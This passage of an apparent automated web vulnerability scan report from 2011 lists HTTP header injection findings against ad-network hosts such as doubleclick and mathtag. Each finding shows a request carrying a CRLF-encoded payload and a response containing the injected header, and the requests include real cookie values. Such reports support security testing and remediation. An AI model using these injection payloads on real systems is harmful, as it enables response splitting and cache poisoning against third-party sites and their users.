22.23. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

22.24. http://jqueryui.com/ui/jquery.ui.widget.js

22.25. http://l.addthiscdn.com/live/t00/250lo.gif

22.26. http://login.npr.org/openid/embed

22.27. http://map.media6degrees.com/orbserv/hbpix

22.28. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s92332599295768

22.29. http://metrics.npr.org/b/ss/nprorg/1/H.17/s91303597942460

22.30. http://mobile.fox8live.com/BlackBerry/default.aspx

22.31. http://pagead2.googlesyndication.com/pagead/imgad

22.32. http://pixel.quantserve.com/pixel

22.33. http://pubads.g.doubleclick.net/gampad/ads

22.34. http://s0.2mdn.net/dot.gif

22.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP

22.36. http://safebrowsing.clients.google.com/safebrowsing/gethash

22.37. http://segment-pixel.invitemedia.com/pixel

22.38. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

22.39. http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg

22.40. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.41. http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif

22.42. http://t.pointroll.com/PointRoll/Track/

22.43. http://toolbarqueries.clients.google.com/tbproxy/af/query

22.44. http://trc.taboolasyndication.com/usatoday/log/2/available

22.45. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955

22.46. http://va.px.invitemedia.com/adnxs_imp

22.47. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj

22.48. http://widgets.macroaxis.com/widgets/content.jsp

22.49. http://www.collegesurfing.com/searchbox-mge-us.php

22.50. http://www.csmonitor.com/Business

22.51. http://www.facebook.com/plugins/like.php

22.52. http://www.fox8live.com/business/default.aspx

22.53. http://www.google-analytics.com/__utm.gif

22.54. http://www.google.com/finance/chart

22.55. http://www.googleadservices.com/pagead/conversion/1030881291/

22.56. http://www.groupon.com/subscriptions/new

22.57. https://www.groupon.com/login

22.58. http://www.macroaxis.com/widgets/url.jsp

22.59. http://www.meebo.com/cmd/getrotate

22.60. http://www.natchezdemocrat.com/

22.61. http://www.npr.org/templates/reg

22.62. http://www.tinbuadserv.com/v3/serve.php

22.63. http://www.usatoday.com/weather/stormcenter/default.htm

23. Cacheable HTTPS response

23.1. https://shop.npr.org/favicon.ico

23.2. https://www.groupon.com/login

23.3. https://www.groupon.com/users/new

24. HTML does not specify charset

24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

24.2. http://480-adver-view.c3metrics.com/v.js

24.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

24.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

24.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

24.6. http://ad.doubleclick.net/pfadx/csmonitor_cim/

24.7. http://ads.bridgetrack.com/a/f/

24.8. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

24.9. http://ads.pointroll.com/PortalServe/

24.10. http://amch.questionmarket.com/adscgen/sta.php

24.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

24.12. http://bidder.mathtag.com/iframe/notify

24.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.14. http://fls.doubleclick.net/activityi

24.15. http://login.npr.org/openid/embed

24.16. http://odb.outbrain.com/utils/ping.html

24.17. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

24.18. http://share.meebo.com/cim/whitev4.html

24.19. http://uac.advertising.com/wrapper/aceUACping.htm

24.20. http://wvue.web.entriq.net/nw/dpm/loadplayer/

24.21. http://www.fox8live.com/images/phone.png

24.22. http://www.fox8live.com/sites/scripps/images/rounding/tab-bg.gif

24.23. http://www.fox8live.com/sites/wvue/images/promos/fox8insider.jpg

24.24. http://www.therepublic.com/assets/images/ui-bg_flat_75_ffffff_40x100.png

24.25. http://www.therepublic.com/assets/images/ui-bg_glass_65_ffffff_1x400.png

24.26. http://www.therepublic.com/assets/images/ui-bg_glass_75_e6e6e6_1x400.png

24.27. http://www.usatoday.com/_common/_includes/_community/taboola-async.ssi

25. Content type incorrectly stated

25.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

25.2. http://480-adver-view.c3metrics.com/v.js

25.3. http://a1.interclick.com/getInPageJS.aspx

25.4. http://a1.interclick.com/getInPageJSProcess.aspx

25.5. http://ad.doubleclick.net/pfadx/csmonitor_cim/

25.6. http://adadvisor.net/adscores/g.js

25.7. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

25.8. http://ads.pointroll.com/PortalServe/

25.9. http://amch.questionmarket.com/adscgen/sta.php

25.10. http://ar.voicefive.com/b/rc.pli

25.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.12. http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js

25.13. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

25.14. http://event.adxpose.com/event.flow

25.15. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

25.16. http://mobile.fox8live.com/ScriptResource.axd

25.17. http://radar.weather.gov/Conus/images/favicon.ico

25.18. http://radar.weather.gov/images/favicon.ico

25.19. http://shop.npr.org/favicon.ico

25.20. http://shop.npr.org/resize.php

25.21. https://shop.npr.org/favicon.ico

25.22. https://shop.npr.org/resize.php

25.23. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

25.24. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

25.25. http://trc.taboolasyndication.com/usatoday/trc/2/json

25.26. http://widgets.macroaxis.com/widgets/content.jsp

25.27. http://wvue.web.entriq.net/nw/dpm/loadplayer/

25.28. http://www.collegesurfing.com/js/MGEProgramCategoryDropDown.php

25.29. http://www.macroaxis.com/widgets/url.jsp

25.30. http://www.srh.noaa.gov/images/favicon.ico

25.31. http://www.usatoday.com/community/tags/GetLinkedByline.ashx

26. Content type is not specified

27. SSL certificate

27.1. https://shop.npr.org/

27.2. https://www.groupon.com/



1. HTTP header injection
There are 14 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4873.npr.og/B5461009

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8fdb9%0d%0a31e2c62f70f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8fdb9%0d%0a31e2c62f70f/N4873.npr.og/B5461009;sz=1x1;pc=[TPAS_ID];ord=0.699075760319829 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.699075760319829&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8fdb9
31e2c62f70f
/N4873.npr.og/B5461009;sz=1x1;pc=[TPAS_ID];ord=0.699075760319829:
Date: Mon, 09 May 2011 15:40:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2d7db%0d%0ac78d659218b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2d7db%0d%0ac78d659218b/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2d7db
c78d659218b
/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 09 May 2011 15:38:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12211%0d%0ad920f750be7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12211%0d%0ad920f750be7/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http%3A//gannett.gcion.com/adlink%2F5111%2F798269%2F0%2F170%2FAdId%3D1587637%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3D;ord=955400653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12211
d920f750be7
/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http: //gannett.gcion.com/adlink/5111/798269/0/170/AdId=1587637;BnId=1;itime=955400653;key=cw27+cw296+cw22+cw5+cw461+cw9+cw145;link=;ord=955400653
Date: Mon, 09 May 2011 15:37:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 523df%0d%0a3531c6c3ac7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /523df%0d%0a3531c6c3ac7/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=310802;contx=weath;an=280;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/523df
3531c6c3ac7
/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=310802;contx=weath;an=280;dc=w;btg=am.h;btg=am.b;btg=cm.ent:
Date: Mon, 09 May 2011 15:37:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ipc-csm/globalisation_US

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1a24a%0d%0ac7bc2fb3a0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1a24a%0d%0ac7bc2fb3a0/ipc-csm/globalisation_US;sz=300x250;click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%26client%3Dca-pub-6743622525202572%26adurl%3D;ord=1775429076? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1a24a
c7bc2fb3a0
/ipc-csm/globalisation_US;sz=300x250;click=http: //adclick.g.doubleclick.net/aclk
Date: Mon, 09 May 2011 15:36:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6735.NPR/utility_search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f36c%0d%0abfaaccb7365 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f36c%0d%0abfaaccb7365/n6735.NPR/utility_search;sz=300x250;tile=1;sc=;ord=6265119875; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f36c
bfaaccb7365
/n6735.NPR/utility_search;sz=300x250;tile=1;sc=;ord=6265119875;:
Date: Mon, 09 May 2011 15:40:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 86a12%0d%0ad65070f037d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif86a12%0d%0ad65070f037d?0.18015406071208417 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif86a12
d65070f037d
:
Date: Mon, 09 May 2011 15:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload b6114%0d%0a02fa660963c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754?&b6114%0d%0a02fa660963c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;0-0;0;58826896;24/24;41597555/41615342/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;;b6114
02fa660963c
=1;~cs=d:
Date: Mon, 09 May 2011 15:35:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1240

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;0-0;0;58826896;24/24;41597555/41615342/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 8b0d3%0d%0a04bcc849ea1 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=8b0d3%0d%0a04bcc849ea1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:16 GMT
Expires: Mon, 09 May 2011 15:35:16 GMT
DCLK_imp: v7;x;44306;0-0;0;58826896;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=8b0d3
04bcc849ea1
;~cs=u:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/t;44306;0-0;0;58826896;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload a9839%0d%0a37a97c57239 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=a9839%0d%0a37a97c57239&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
